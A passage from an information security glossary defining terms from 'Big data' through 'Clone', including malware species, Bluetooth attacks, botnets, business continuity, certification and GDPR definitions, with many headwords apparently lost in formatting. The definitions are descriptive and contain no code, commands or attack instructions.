Huge (multi-exabyte), rapidly changing, highly complex data sets that cannot be processed adequately with conventional database applications may require radically different approaches.  Security-related logs in large organisations may approach this scale, where conventional data analyses intended to predict impending security threats can take so long to complete that the incidents may have already happened by the time they are reported.  Term often misused by advertisers with a penchant for hyperbole.  See also UBA, SIEM, IDS/IPS and NTA.

Big Brother

Name of the overbearing authoritarian establishment in George Orwell’s dystopian novel “Nineteen eighty-four”.  Euphemism for mass surveillance.


Hacker term for a program that combines multiple executables within one program.

(Bank Identification Number),
(Issuer Identification Number)

The first six digits of a payment card number identifying the card issuer, hence a cracker or carder revealing several is indicating that he has card numbers for those institutions.

Binding corporate rules

“Personal data protection policies which are adhered to by a controller or processor established on the territory of a Member State for transfers or a set of transfers of personal data to a controller or processor in one or more third countries within a group of undertakings, or group of enterprises engaged in a joint economic activity” (GDPR).


Measurable physical characteristic of a person, such as their fingerprints, DNA profile, iris or retinal pattern, palm print, ear shape, facial shape, voice pattern, vein pattern, signature or cursive writing and typing dynamics, that can be used as a credential to identify and/or authenticate them.  Personal information.

Biometric data

“Personal data resulting from specific technical processing relating to the physical, physiological or behavioural characteristics of a natural person, which allow or confirm the unique identification of that natural person, such as facial images or dactyloscopic data” (GDPR).

(Basic Input/Output System)

Low level firmware used to interact with peripherals such as disks, keyboards and mice, complete self-checks and initiate the operating system boot sequence on a computer.  Normally supplied with the motherboard and stored on a ROM, EPROM, EEPROM or flash memory chip capable of being updated or replaced.  Deprecated in favour of UEFI.

BIOS password

Some BIOS firmware requires the user to enter a password to continue the boot sequence or access a device.  This is meant to stop a casual thief from booting/accessing system resources, files etc. but the control is usually weak and easily defeated or bypassed by a competent hacker or forensics specialist.

Birthday paradox

Term reflecting the counterintuitive fact that, in a random group of at least 23 people, it is ‘likely’ (i.e. the probability is greater than 50%) that two of them celebrate their birthdays on the same day of the year.  Has been used as the basis for a cryptanalytic attack that exploits relationships between two sets of data (e.gpasswords and the corresponding hash values) where a match between any value from one set against any value from the other set is considered significant (i.e. discovering any valid password in an entire password file).  This is far more likely than finding a match to a given value (e.g. finding the password for a particular user ID).  A valid concern if all entries in a fingerprint database are scanned for any cross-matches as opposed to scanning a particular set of prints from a crime scene or suspect against the database.


Notional device or network address to which unwanted data/traffic can be sent.  Antivirus analysts sometimes hijack the command-and-control features of malware to send stolen data down a sinkhole instead of going to the criminals behind the scams.  See also blackhole.


One of several species of ransomware in the wild in 2019 that strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keysTargets medium to large organisations, demanding ransoms between ~$50k and ~$1m.

Bitwise image,
bit copy

A bit-by-bit identical image copy of all readable information on a storage medium that includes not only conventional data content but also metadata, alternative streams and the unallocated spaces between data files, past the end of file markers.  Normally used for forensic purposes.  May include remnants of data left behind after files have been incompletely deleted or moved, and perhaps (using special forensic techniques and/or hardware) data from disk sectors marked unreadable by the firmware or disk operating system.

Black bag ops,
black bag operations

Covert activities to penetrate, infiltrate or otherwise physically compromise a target’s premises in order to capture useful intelligence, filling the notional swag bag.  See also black ops.

Black hat

Malicious, self-serving, unethical hacker or crackerCfgrey hat and white hat.


List of email servers believed to be pumping out spam, used as a crude form of spam filtering (‘crude’ in that it tars all users of those servers with the same broad brush).


List of email addresses, email servers (see blackhole), URLs (see bit-bucket), people, apps etc. that management deems unacceptable, banned or barred.  Since the default action for unlisted items is usually to permit their access or use, this control generally fails insecure“A list of email senders who have previously sent spam to a user” (NIST SP800-114 rev1). Cf. whitelist.


Form of coercion or extortion used to force someone into doing something inappropriate, illegal or simply against their will, for example by threatening to reveal some embarrassing corporate or personal secret (perhaps a previous criminal act or sexual proclivity) if they do not comply with the blackmailer’s instructions.  See also sextortion.

Black market,
criminal underground

Unofficial, covert, unregulated and untaxed commercial market for stolen property (both physical and intellectual) plus the knowledge, tools, processes (such as money laundering) and other resources of the criminal fraternity.  See also hacker underground, Darknet and Silk Road.

Black ops

Covert (‘blacked-out’) activities normally run by government-sponsored or state security services to infiltrate, undermine or otherwise compromise an adversary, in a manner that permits them plausibly to deny the existence, knowledge or sponsorship of the operation, typically because it is unethical or illegal.  See also black bag ops.

power cut

Extended interruption to the power feed.  Computers and other electronic systems without alternative power sources such as battery-backup, UPS or standby generators, will of course fail in a blackout, potentially corrupting vital system or data files in the process as well as interrupting services.  See also dip, brownout, surge and spike.


Species of POS memory-scraping malware in the wild.  Used to compromise the US retailer Target in 2014.


Species of malware deceptively marketed as a $40 antivirus and spyware package until the criminal operation behind it was shut down by the FBI in 2014.

Black swan event

Outlier/extreme/rare event which is so unusual that it could not reasonably have been predicted using risk analysis processes and models.  Metaphorical term coined by Nassim Nicholas Taleb, originally in connection with financial management but later applied across other fields.  We humans find it difficult to even contemplate, let alone deal rationally with black swans.  Many of us struggle even to take credible worst case scenarios seriously.


Infamous network worm from 2003.


Name of a talented Swiss cryptographer who invented a brute force attack on PKCS#1 v1.5, used by SSL.  Millions of challenges and responses concerning the validity of the message padding are used to determine the key.

Blended threat,
blended attack

Form of attack that combines methods, for instance using social engineering to dupe a target into unwittingly infecting their system with malware.

Bletchley Park

For most of the 20th Century, this manor house and grounds North of London housed a top-secret UK government communications and cryptography unit.  During World War II, Alan Turing, Tommy Flowers and team designed and built the Colossus computer to decrypt German and Japanese traffic including Enigma.  Now a fascinating museum.


Software that has become ‘bloated’ through the incremental addition of marginally useful functions and features, making it more complex and less secure (more vulnerable) as a consequence.


(a) To prevent something from taking place.  (b) Unit of data, either of a fixed size (so many bits, bytes or characters) or delineated by specific marker sequences, characters etc.  (c) “Unit in which data is stored and retrieved on disk and tape devices” (ISO/IEC 27040).


Distributed data architecture used to establish an auditable, high-integrity record of changes to data by linking each change in a ledger to predecessors in the logical sequence using digital signatures.  Does not rely on a trusted authority.  Commonly applied in cryptocurrencies such as Bitcoin.

Block cypher

Symmetric encryption algorithm that encrypts a block consisting of a defined number of sequential plaintext characters at a time.  Cf. stream cypher.


Embarrassing and often humorous human error.  Variously known as a bailout, balls-up, bloomer, blunder, boner, booboo, boob, botch, bungle, bust-up, clanger, corpsing, gaffe, foul-up, fumble, faux pas, goof-up, howler, mistake, screw‑up, snafu, Spoonerism, wipeout etc.  An accidental integrity failure.


Prefix in the terms that follow, implying the exploitation of Bluetooth connections, with or without the device owner’s authorisation and/or knowledge.


A cluster of Bluetooth driver spoofing vulnerabilities, disclosed in 2017, affecting over five billion Android, Linux and Apple devices.


The covert exploitation of security vulnerabilities in someone’s Bluetooth equipment to bug them, for example by surreptitiously causing a compromised Bluetooth cellphone to call another number and so transmit private conversations in the vicinity of the compromised device.


Sending unsolicited text, audio or video messages (e.gspam) to a Bluetooth device.  While that may be annoying, it is essentially harmless but Bluejacking may also encompass more sinister Bluesnarfing, Bluespying or Bluebugging attacks that involve hijacking (taking control of) the victim’s device.


Hacking a Bluetooth device, violating the user’s privacy and potentially compromising confidential personal and/or proprietary data such as email or SMS/TXT messages, contact details, diaries, photos/videos etc. stored on the device.


Type of hacker attack that exploits security vulnerabilities on Bluetooth equipment to spy on the user, for example accessing stored GPS data to determine where they have been.

Blue team

The defensive team, tasked with protecting the enterprise (or at least its flags) against mock assaults by outsmarting the red team.  See also purple and white team.


Wireless networking protocol intended for short-range use over a few meters (e.g. to connect a wireless headset to a mobile phone) but often accessible over longer distances, especially with higher-power Bluetooth systems built-in to some laptops and vehicles, and things.  Early versions of Bluetooth were notoriously insecure but even current versions have issues.  “Wireless technology standard for exchanging data over short distances. Note: ‘Bluetooth’ is a trademark owned by the Bluetooth SIG.” (ISO/IEC 27033-6).  See also ZigBee.

Bluff ransomware,

Malware that gives the appearance of having encrypted or otherwise blocked access to the usersdata in order to extort a ransom payment out of naïve victims, but in reality is simply displaying the message (which typically warns against further checks by threatening to destroy the data).  A form of scareware, a social engineering incident.

Board of Directors
(the Board)

The most senior level of management within the organisation with overarching accountability for protecting and legitimately exploiting the organisation’s assets on behalf of its owners or other stakeholders.  The Board typically delegates responsibility for corporate governance including information security to Officers such as the Executives, retaining a strategic oversight rôle.

Body cam[era], bodycam

Portable CCTV camera worn on or about a person, recording the activities of people around or interacting with the wearer.  The police are increasingly using body cameras both to record valuable evidence from scenes of crime and to exonerate themselves if accused of excessive violence etc.  Miniature cameras can be used for covert surveillance (i.e. spying) as well as for more mundane activities such as recording extreme sports.  See also dash cam.

Body language

See non-verbal communication.

Boiler room

Fraud involving heavy promotion of over-valued or non-existent stocks and shares by bogus stockbrokers promising big investment returns to naïve investors.


Strong post mounted firmly in the ground, intended to reduce the risk of vehicular attacks on a facility.  A physical security control.

Boot sector virus

Form of malware that infects the boot sector (Master Boot Record) on a disk i.e. that part of the disk which is accessed first by the bootloader (itself stored in firmware) in order to load the operating system and so start up the computer.  This precedes the loading of most security software, including old/basic antivirus programs which execute only after the operating system has started (modern antivirus programs load and execute at the earliest opportunity).


See stresser.


Short for ‘robot’.  (a) Networked computer under the remote control of hackers, often compromised using Trojans.  The owner of the computer usually remains oblivious to the compromise.  Often corralled together in botnets.  Also known as a zombie, as in the ‘living dead’ of Hammer horror fame.  (b) Any autonomous piece of software capable of roaming systems and/or networks, whether for benign (e.g. indexing Web pages for search engines) or malicious (e.gspyware) purposes.

Bot master, botmaster

Hacker or cracker who commands and controls a botnet.


Networks of bots that are used for hacking/criminal activities such as spamming, identity theft, carrying out DDoS attacks or as launch pads for attacking other systems.  Botnets comprising hundreds or thousands of compromised machines are rented out to hackers on the black market.


Malware used to command and control a bot, for example allowing the bot master to download, install and run a code module for a particular type of network attack.


Emails that are undeliverable for some reason (e.g. addressee unknown) may be returned with an explanatory note (“bounced”) or silently deleted – the former approach helps senders but gives spammers clues about the status of email addresses.


See security guard.


Demarcation between zones, typically where private property abuts public land or someone else’s private property, or private networks abut public networks, or the edge of someone’s personal space.  Alternatively, the values or other parameters that distinguish valid from invalid data.  See also perimeter.


Widely held to have been the first personal computer virus, created in 1986 as a proof-of-concept by two Pakistani geeks who subsequently set up an ISP called Brain Communications.  Spread on floppy disks.  Strictly speaking, it was not a true virus since it did not attach itself to executable programs, and it was pre-dated by viruses on other platforms such as Creeper (DEC PDP-10, 1971), ANIMAL/PERVADE (Univac, 1974) and Elk Cloner (Apple II, 1981).


The set of commonly-held perceptions, values and beliefs in the minds of prospects and customers about an organisation and/or its products (goods and services) e.g. “They are trustworthy and high quality”.  Whereas logos and phrases may be trademarked, inventions patented, designs registered and written/spoken words copyrighted, the intangible component of brands makes them difficult to describe let alone protect, yet brands can be extremely valuable, if vulnerable, corporate information assets“Marketing-related intangible asset including, but not limited to, names, terms, signs, symbols, logos and designs, or a combination of these, intended to identify goods, services or entities, or a combination of these, creating distinctive images and associations in the minds of stakeholders, thereby generating economic benefits/values” (ISO 10668).  See also reputation.

[Monetary] Brand value

“Economic value of the brand in transferable monetary units.  Note: The result obtained can be either a single economic value or a range of values” (ISO 10668).


Form of information security incident normally involving deliberate action by someone, as opposed to those with purely accidental causes, for example penetrating a defensive barrier such as a wall or firewall, or actively compromising security in general.

Bribe, bribery

The offered, promised or actual provision and acceptance of illicit financial or other inducements with the expectation of favours in return, such as the opportunity to bid favourably for or enter into a contract, or lenience (‘turning a blind eye’) following a compliance failure.  A form of corruption and malfeasance that, despite being both unethical and illegal, is an integral part of business life in some cultures and industries.

(Permanent Denial of Service)

To damage a device and take it out of service in such a way that it is impossible or uneconomic to recover it, making it ‘as useful as a brick’.  May result from an accident (such as a bug or error when updating flash BIOS, or mechanical damage such as dropping the device in the sea) or a deliberate attack.


Malware that infects things and, if they fail a simple security test, irreparably damages their file systems, thus bricking them.  A vigilante worm.


Reduction in power supply voltage lasting more than just a few micro- or milliseconds, enough to dim incandescent lights (hence the name) and cause the failure of electronic systems having inadequate voltage regulation.  See also dip, surge, spike and blackout.

Browser hijack

Malware attack that changes the user’s normal browser home page or new tab selection to bring up some other inappropriate/unsafe website.

Brute force

(a) Form of cryptanalytic attack in which multiple passwords, PINs or encryption keys are entered in rapid succession in an attempt to guess the correct one by chance, exhausting the key space.  Often involves automated tools such as rainbow tables but may be performed manually against low-entropy PIN codes and weak passwords.  (b) A straightforward attack on physical security, such as ram-raiding, chain-sawing through fences and walls, or threatening/assaulting security guards or receptionists.


British Standard code of practice for pre-employment security screening (background checks and security clearance).

Buffer overflow

Software bug that allows – or fails to prevent – a buffer space in memory being over-filled with excessive amounts of data, such that it overwrites adjacent memory locations.  While this normally results in the program simply crashing, hackers are adept at crafting malicious data in such a way that the overspill is directly executed or points to another memory location where exploit code has also been inserted.  Buffers are used to hold interim values and the results of internal calculations and text operations as well as to hold data input through the keyboard or arriving through the network: internal buffers may also be vulnerable to overflows if unchecked.


(a) Programming fault accidentally inserted into a program by a programmer.  Most bugs are relatively benign but some create vulnerabilities that may lead to security incidents such as a crash or compromise.  See also web bug and flaw.  (b) A covert surveillance device used to snoop surreptitiously on the online activities, conversations etc. of a target, potentially compromising trade secrets or personal information.


TOP SECRET NSA ‘decryption program’ disclosed by whistleblower Ed Snowden.  Part of a global surveillance/SIGINT framework systematically snooping on encrypted traffic including SSL and (some) VPNs.  A similar program in the UK is called Edgehill.


Trespass with intent to steal.

Burp suite, Burp

Network hacking/penetration testing tool for attacking Web applications.  Free and commercial versions.


Class of information asset, business function, process etc. that is vitally important to the organisation’s core purposes, objectives or mission.  The potential severity of information security incidents affecting such assets, the scale and nature of the impacts, implies that realistic threats acting on known vulnerabilities almost certainly qualify as high risks.  See also Tier 1, 2 or 3 and safety-critical.

Business continuity

Term encompassing the resilience, recovery and contingency arrangements and plans used to mitigate the effects of incidents and disasters affecting information processes, IT systems, networks and business processes, supply chains etc.

Business Continuity Management (BCM)

The process of directing, controlling and overseeing the organisation’s approach to business continuity, such as business impact assessment to characterize business-critical processes and identify the supporting systems and resources, plus the production, exercising and maintenance of the business continuity plans etc.

Business Continuity Management System

The management system for business continuity.

Business Continuity Plan, Plans or Planning

A pre-considered preparative approach intended to ensure the continued operation of essential business processes (including essential supporting systems, resources and so forth), despite serious incidents or disasters that might occur, through a suitable combination of controls such as resilience, disaster recovery and contingency arrangements that will minimize the impactsCf. Best Current Practice.

Business directory fraud

Through social engineering, fraudsters manipulate victims into over-paying for entries in business directories, listings or databases that are largely worthless and may not even exist.  Common techniques include persistent cold-calling and spamming, misrepresenting the directories, misleading websites, submitting invoices to ‘renew’ non-existent subscriptions directly to lowly procurement or accounts clerks or personal assistants, innocuous-looking forms using the word ‘insertions’ (meaning paid advertisements) in the small print, inducements such as ‘free offers’ and entries in business awards, and baseless coercive threats from self-styled ‘debt collection agencies’.

Business Email Compromise

See BEC and VEC.

Business Impact Assessment

That part of risk analysis which involves reviewing the potential business impacts of more or less serious information security incidents on critical business processes, in order to determine the associated availability and conceivably other information assurance or security requirements.

Business Resumption (or Recovery) Plan (BRP)

Preparations to enable essential business activities to be recovered or restored following a disaster that has disrupted them, typically by providing business-critical information services from an alternate location.

(Bring Your Own Cloud)

Corporate scheme allowing workers to use certain cloud computing services for business purposes, provided suitable information security controls (such as policies concerning classified information, strong user authentication, data encryption and other access controls) are employed.  Unless blocked by network security controls, cloud apps (such as Google Docs or Office365) and cloud storage (such as Google Drive or Dropbox) may be used by workers to exfiltrate valuable information from the organisation, while malicious cloud apps are a form of malware.

(Bring Your Own Device)

Corporate scheme allowing workers to use their PODs for business purposes, provided suitable information security controls are employed (e.gpolicies, MDM, encryption and antivirus software).

(Bring Your Own Thing)

Corporate scheme allowing workers to use their things for business purposes, provided suitable information security controls are employed (e.gpolicies, MDM, encryption and antivirus software).

Byzantine fault

A class of system failures with symptoms or characteristics that depend on the observer’s perspective or context.  A faulty system may generate data that differ and perhaps appear normal to some other systems, frustrating the use of simple consensus to spot and react to exceptions.

Byzantine Fault Tolerance (BFT)

System architecture designed to avoid or at least identify and respond appropriately to [some types of] Byzantine fault.

Caesar’s cipher

Cryptographic algorithm originally used by Julius Caesar to encrypt secret messages for soldiers in the Roman colonies.  A simple monoalphabetic substitution cipher, easy to break today but evidently adequate to meet Caesar’s data confidentiality requirements back then.  See also Vigenére’s cipher.

Cain and Able,

Password recovery and hacking tool capable of brute-force and dictionary attacks on a wide variety of password hashes and cryptographic keys, on Windows systems.

Caller ID (identity)

Technical facility to display and store a phone caller’s phone number on the called phone, enabling the recipient to identify the caller, call them back etc.  Unfortunately, the technology is not sufficiently secure to prevent social engineers spoofing their numbers (e.g. so fraudsters appear to be calling from a bank’s number).

(Controller Area Network bus)

Communications standards for microcontrollers (Electronic Control Units) and other electronic devices in vehicles, developed by Bosch.  The primary security requirements in such environments are to ensure data and system integrity and availability.


Costly commercial network security/penetration test tool from IMMUNITY.  Automates hundreds of exploits against known vulnerabilities.


Ability, competence, suitability, capacity and/or willingness to do something successfully.  “Quality of being able to perform a given activity” (ISO 19440:2007).


Capability of an IT system, database, network, generator etc. to deliver the required services, process the requisite number of transactions, store sufficient data etc.  Related to availability and performance.  See also capacity management.

Capacity management

Dynamically aligning the provision of IT systems and services with changing demands, in order to maintain appropriate service levels (availability and performance).

Capture The flag

See CTF.


Bank Trojan in-the-wild, built using Carberp


Crimeware kit for building Trojans.  As with Zeus, the source code for Carberp was released onto the Internet.


Criminal who steals, counterfeits, trades and/or validates credit card data.


Stealing, counterfeiting, trading or validating credit card data.


Without due care, failing to act sufficiently cautiously under the circumstances.  Less severe than negligent or reckless.


Early Internet surveillance system implemented by the FBI in 1997 as PC software, capable of selectively monitoring the Internet traffic to/from specified users by ‘packet sniffing’ on particular network cables.  Based on even earlier surveillance systems (such as Omnivore).  Renamed DCS1000 to appear less threatening.  Superseded in 2001 by ever more sophisticated and capable remote, distributed surveillance systems.

(Continuous Adaptive Risk
Trust Assessment)

Assurance approach involving security monitoring that is continuous (as opposed to periodic e.gpenetration testing), integrated across all levels (from the hardware platform to the applications) and adaptive (responding to risks in real time e.g. using SOAR).  Concept promoted by Gartner in 2018.

(Cloud Access Security Broker)

Similar to a firewall, the CASB acts as a trusted go-between linking cloud computing users with their Cloud Service Providers, applying security rules to the commands and data passing through.

cascading failure

Information security incidents adversely affecting something (such as electricity generation) on which something else depends (most electrical and electronic devices in that case) are likely to cause widespread, rolling and longer-lasting disruption as the effects spread, with additional impacts  further down the line.  Therefore, incidents which harm critical infrastructure are likely to be magnified by the consequential impacts over an extended timeframe.

Cashing out

Hacker phrase for the process of converting “hot” (stolen) information assets into untraceable cash through various black market trades and money laundering schemes.  See also monetize.

(Cheapest Available Technology/Technique Narrowly Avoiding Prosecution)

Spending the least amount necessary to satisfy the letter of the law, where there is no apparent business advantage in going any further.  A drawback of setting low hurdles in compliance-driven cultures.


Warning or proviso.  “A marking that indicates that the information has special requirements in addition to those indicated by the classification.  The term covers codewords, source codewords, releasability indicators and special-handling caveats” (NZ information Security Manual).


UK financial services industry scheme, based on CREST, to accredit and guide penetration testers in testing banking systems

(Cloud Controls Matrix)

Generic suite of information security controls applicable to various types of cloud computing services, as defined by the CSA.  Addresses both the service providers’ and consumers’ perspectives.  More.

(California Consumer Protection Act of 2018)

An EU-style privacy law comes into force in January 2020, imposing obligations on medium to large commercial organisations to ‘implement and maintain reasonable security procedures and practices’ in order to protect personal data (as defined in the Act) and give Californians the right to opt out of companies selling their personal data.

(Closed Circuit TeleVision)

Private audio-visual surveillance system typically used by security guards to monitor premises, safes/vaults etc. for intruders, thieves and saboteurs, by local councils, public bodies and the police to oversee public places for disorder, crimes and safety issues, and by industrial plant operators to monitor the state of the plant.  Modern CCTV systems typically use high definition digital IP cameras on a network.

(Content Delivery Network)

Essentially a geographically-dispersed commercial Web content caching service that, where possible, delivers content from copies held on Web servers near to the user rather than from the original sources.  Reduces latency, increases download speeds, and can help mitigate the effect of Denial of Service attacks and other incidents.

Cease and desist letter,
demand letter,
infringement notification

A lawyer’s letter formally requiring someone permanently to stop doing something, generally reinforced with an explicit or implicit threat to take legal action against them if they persist. 


One of several species of ransomware in the wild that surreptitiously encrypts victimsdata, coercing them into paying a ransom for the decryption keys.  Evidently does not run on Russian-language computers, hinting at its possible origin.  Available to rent as Ransomware as a ServiceFlawed cryptosystem in the initial version has presumably been replaced in Cerber 2.

(Computer [or Cyber] Emergency Response Team),
(Computer [or Cyber] Incident Response Team)

An IRT that specifically handles IT-related incidents.  Many countries have national CERTs, globally supported and coordinated through the CERT-Coordination Center (CERT/CC) in Carnegie Mellon University’s Software Engineering Institute.


The process by which something is formally evaluated against a set of pre-defined criteria and, if appropriate, confirmed compliant“A procedure by which a formal assurance statement is given that a deliverable confirms to a specified standard” (NZ information Security Manual).

Certification Authority

Trusted body that digitally signs and issues digital certificates to authenticated users or systems in a PKI.  “Authority trusted by one or more users to create and assign public-key certificates.  Notes: Optionally, the certification authority can create the users' keys.  The role of the certification authority in this process is to guarantee that the individual granted the unique certificate is, in fact, who he or she claims to be.  Usually, this means that the CA has an arrangement with an institution which provides it with information to confirm an individual's claimed identity.  CAs are a critical component in information security and electronic commerce because they guarantee that the two parties exchanging information are really who they claim to be.” (ISO/IEC 27033-1).  “An official with the authority to assert that a system complies with prescribed controls within a standard” (NZ information Security Manual).

Certification body,

Accredited organisation deemed sufficiently independent, competent, diligent and trustworthy to review and certify other organisations’ compliance with specifications or requirements formally defined in applicable standards or regulations such as ISO/IEC 27001.  See also Certification Authority.

Certification documents

Compliance certificates, statements etc“Documents indicating that a client's ISMS conforms to specified ISMS standards and any supplementary documentation required under the system” (ISO/IEC 27006).

Certification Practice Statement (CPS)

Policy document formally and explicitly defining a given PKI.

Certification report

“A report generated by a certification body of a Common Criteria scheme that provides a summary of the findings of an evaluation” (NZ information Security Manual).

Certificate Revocation List

A published list of digital certificates that have been revoked by the Certification Authority and are therefore invalidPKI systems are supposed to check for, and handle, certificates that have been revoked, for instance if the CA has been compromised meaning that fake certificates are or might be in circulation.


Vulnerability in digital certificate handling by some privileged remote access/systems administration tools on Android, exploited by malware in 2015.

Chain letter

An item of correspondence (originally a postal letter, latterly an electronic message such as an email) entreats the recipient to pass it on to further recipients.  The content of chain letters varies and, although some are legitimate, most are fraudulently using social engineering techniques to part fools from their valuables (e.gpyramid schemes).  Apart from consuming network bandwidth, data storage capacity, wasting users’ time and fooling victims, chain letters sometimes gain false respectability as a result of being passed on, and effectively endorsed, by trusted but foolish intermediaries.


Flexible but heavy body armour constructed from interlocking steel rings, guarding against glancing blows.  Supplemented by armour plates, shields and helmets protecting the most vulnerable areas of the body against direct hits and penetration by weapons.

Chain of custody

Maintenance of a complete, accurate and trustworthy record of the physical custody and treatment of forensic evidence at every point between its original collection and eventual presentation in court, such that there is no reasonable doubt as to its origin, authenticity and integrity“Demonstrable possession, movement, handling and location of material from one point in time until another” (ISO/IEC 27050-1).


(a) Pose a question intended to raise or dispel doubt or concern, or to elicit a strong reaction, for example a lawyer cross-examining a witness in court.  (b) Something difficult to overcome or complete successfully.


Protocol or process in which the respondent has to provide the correct, anticipated response or credential, otherwise the challenger knows something is amiss.  Mediaeval gatekeepers demanded “Who goes there?” in anticipation of a visitor revealing the secret pass word to authenticate themselves and be allowed to pass through a gate.  Nowadays used to establish network communications by confirming that a counterparty holds the correct private key without actually disclosing the key over the network, typically by having them encrypt and return a nonce supplied by the challenger who can then decrypt the response with the respondent’s public key to verify that the respondent does in fact hold the corresponding private key (a zero knowledge approach).

(Counter-electronics High-powered microwave Advanced Missile Project)

Boeing EMP cyberweapon which directs intense bursts of electromagnetic energy at selected target buildings (and perhaps vehicles and other cyberweapons) from a passing aircraft or drone in order to destroy/disable the electronic systems, devices, IT systems and network infrastructure within. 


See probability.

Change control

Management process for proposing, reviewing and accepting or rejecting changes to a process, system and/or the associated documentation.  Part of change management.

Change key

Conventional physical locks are designed to be unlocked only by keys having the corresponding patterns, keys which will not open locks of other patterns: these single-lock keys are known by locksmiths as change keys.  Cf. master keys.

Change management

The totality of activities used to plan, risk-assess, authorize, control, direct, document changes to the organisation, and its IT systems, business processes, products etc.

Chatham House rule

An informal arrangement (a gentleman’s agreement) to protect the anonymity of information sources at meetings.  “When a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speaker(s), nor that of any other participant, may be revealed” [Chatham House].


A dishonest person who deliberately bends or breaks the rules for personal gain.  A relatively minor fraud.


(a) A static record or snapshot of the state of a computer system, program, database etc. at one point in time to which the system may be rolled-back if necessary.  See also backup.  (b) A physical guard house or similar place manned by security guards through which people must pass some sort of inspection (e.g. checking ID cards, metal detectors).

Checks and balances

The reconciliation of accounts or data files compiled separately but supposed to match item-for-item, for example in double-entry bookkeeping every credit should correspond to an equal and opposite debit, hence the total of a debit account should precisely equal the total of the matching credit account.


One of several species of memory-scraping malware in the wild.

Chief Security Officer

Director or senior/executive manager with overall responsibility for security, including physical security and perhaps information security.  Chairs the Security Committee and reports to executive management.  See also CISO.

Chinese wall,
paper wall

Notional physical isolation or air-gap separation between people, business functions/departments/units, organisations, networks, systems etc. intended to prevent the inappropriate passage of confidential information between them, avoid conflicts of interest and/or maintain divisions of responsibility.

chip and PIN,
chip card

Physically secure payment, charge, store, bank, credit, debit or EFTPOS card containing an embedded cryptographic module – in practice, a small integrated circuit laminated within the card.  Compared to magnetic stripe cards, it is extremely difficult for forgers to duplicate well-designed and implemented cryptographic modules due to their physical and logical security controls.  Normally, the user must enter their correct PIN code into the chip-n-PIN card reader to authenticate themselves and ‘unlock’ the card (multi-factor authentication), further controlling against loss or theft of the card provided neither the card reader nor the PIN code have been compromised (two known modes of attack).


See meltdown.

Chosen plaintext

Cryptanalytic technique in which the analyst can obtain the cyphertext corresponding to some plaintext of his choosing, which acts as a crib.  See also known plaintext.

Christmas tree

One of the earliest network worms, released in 1987.  Less damaging than The Internet Worm.

(Central Intelligence Agency)

Spooky US government agency responsible for overseas intelligence and intelligence on foreigners, relating to illegal drugs, arms trafficking, terrorism etc.  See also FBI and DHS.

CIA triad

The primary objective of information security is to protect information assets against the compromise of their Confidentiality, Integrity and Availability (CIA).  In addition to those three, other objectives may also be relevant under various circumstances e.gassurance, auditability, accountability, non-repudiation and complianceCf. Parkerian hexad.


A message written in a secret code, or the mechanism for generating it.  See algorithm.

Circumstantial evidence

Forensic evidence that is peripheral, implicated or related in some indirect way with an incident, requiring inference to make the association.  Cf. direct evidence.



(Certified Information Systems Auditor)

The preeminent qualification for ICT auditors worldwide, issued by ISACA.

(Cybersecurity Information Sharing Act)

US law to encourage the sharing of cyberthreat indicators between US corporations and the US government by limiting their liabilities in so doing.

(Chief Information Security Officer)

Executive with overall responsibility for the governance and management of information risks.  See also CSO and ISM“A senior executive who is responsible for coordinating communication between security, ICT and business functions as well as overseeing the application of controls and security risk management processes within an agency” (NZ information Security Manual).


RAT generated using the Zeus crimeware kit installs a remotely-configurable botnet to mount various attacks.

Citizen programmer

Largely untrained and self-taught amateur software developer who writes spreadsheets, macros, utilities, databases, custom reports and/or other programs more as a hobby interest than a profession.  See also End User Computing.


Assertion or verifiable statement of fact e.g. a patent claim defines possible applications of an invention protected by the patent; an insurance claim is an application by an insured party for compensation under the policy as a result of an insured event; manufacturers’ claims regarding their products (goods and services) may include information security, privacy and other features and strengths.

Clark-Wilson model

Formal model or architecture developed by David D. Clark and David R. Wilson in 1987 elaborates on the Biba model to protect the integrity of information in general, not just computer data.

Class, classify, classification

Pragmatic grouping-together of similar or related information assets that are believed to share similar risks and hence control requirements.  While classification is a quick process that reduces the need individually to risk assess and identify security controls needed to protect every single asset in each class, the appropriate generic controls still need to be applied.  Furthermore, generic controls may not be ideal for a specific situation, hence higher classes may require more intense risk analysis and bespoke controls.  Classification typically involves confidentiality or privacy criteria but more complex schemes may also take account of integrity and availability requirements.  Unfortunately, there is no universal agreement on classification labels and their meanings, hence in addition to the compliance issues within any organisation there are additional risks of misinterpretation leading to inadequate or inappropriate security when classified materials are shared between organisations.

Classified information

“Government information that requires protection from unauthorised disclosure” (NZ information Security Manual).

Classified systems

“Systems that process, store or communicate classified information” (NZ information Security Manual).


A basic low-assurance form of sanitisation“Sanitize using logical techniques on data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques using the same interface available to the user” (ISO/IEC 27040).


See plaintext.

Click bait, click-bait, clickbait

Something attractive or intriguing (such as fake news and scantily clad people) that lures unsuspecting computer users to click a link, open an attachment, install or run a program or whatever, leading typically to their devices being infected with malware and/or their being defrauded or otherwise compromised.  A form of social engineering.  The thriving underground market in clickbait pays a premium for clickbait pages with tens or hundreds of thousands of visitors, especially affluent Westerners.

Click fraud

Fraud techniques targeting click-through affiliate marketing schemes that pay a bounty for visitors’ clicks.  In one form, malware surreptitiously swaps genuine affiliate codes embedded in URLs and cookies for codes to the fraudsters’ own accounts.  In another, malware racks up large pay-per-click charges and/or artificially inflates website reputational ratings (and hence commercial value) by ‘clicking’ online advertisements.


Hacking technique that surreptitiously an unexpectedly diverts visitors’ browsers to a different website, typically then launching malware attacks against visitors’ ICT devices.  See also click fraud.


The sinking feeling that follows an unwise click on a dubious link, app, attachment or security warning message.

Clipper chip

Failed US government initiative in the mid-1990s to introduce a cryptographic subsystem on a proprietary computer chip using Skipjack with cryptographic keys recoverable by the authorities, allowing them to decrypt data at will.  Aside from flaws in the cryptographic design, introducing additional security vulnerabilities, and the obvious trust, privacy and oversight issues relating to key escrow and surveillance, black hats would simply avoid Clipper thus negating its alleged purpose.  The project’s incredible naïveté hints at ulterior motives: the real goal might have been to raise awareness of the social issues arising from the use of strong encryption, particularly by criminals and terrorists.  Side-effects included stimulating the dissemination and use of other strong encryption systems, and a backlash against invasions of privacy by the authorities.

Clone, cloning

Controlled security devices such as authentication tokens and passes, keys, virtual systems, databases, programs etc. are vulnerable to being duplicated/copied illicitly unless there are adequate preventive and/or detective controls.  They may also be cloned for legitimate reasons such as backups, business continuity, disaster recovery, hardware replacement, testing or forensic purposes.

Close call, close shave,
